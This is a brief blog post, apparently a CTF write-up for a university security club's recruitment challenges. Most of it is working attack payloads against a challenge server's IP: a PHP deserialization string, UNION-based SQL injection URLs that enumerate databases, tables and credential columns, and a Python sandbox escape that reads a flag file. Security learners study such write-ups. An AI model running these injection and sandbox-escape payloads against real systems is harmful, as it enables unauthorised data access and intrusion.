[清华网络安全技术协会招新](WEB)
2018-05-17 本文已影响358人
王一航
没什么营养的文章,可以选择忽略不看,同样很久以前的文章了...
http://120.76.114.164:21080/web6/?pass=O%3A7%3A%22justfun%22%3A2%3A%7Bs%3A5%3A%22enter%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A2%3B%7D
image.png
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(schema_name),%27b%27%20from%20information_schema.schemata%20order%20by%201%20desc%23
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(table_name),%27b%27%20from%20information_schema.tables%20where%20table_schema=%27web%27%20order%20by%201%20desc%23
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27user%27%20order%20by%201%20desc%23
id: id,name,pass
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web1_users%27%20order%20by%201%20desc%23
id: name,pass
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web3_users%27%20order%20by%201%20desc%23
id: id,name
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web4_messages%27%20order%20by%201%20desc%23
id: id,message
message: b
image.png
flag0
flag1
image.png
flag3
尼玛...四道题居然在同一台服务器上...
感觉整不好可以直接拿到服务器权限啊...
居然存在第二题...
image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png
~ ›› nc 120.76.114.164 12008
Give me your command!
().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
inp= ().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
Return Value: ctf{pyth0n_1s_als0_unsaf3}
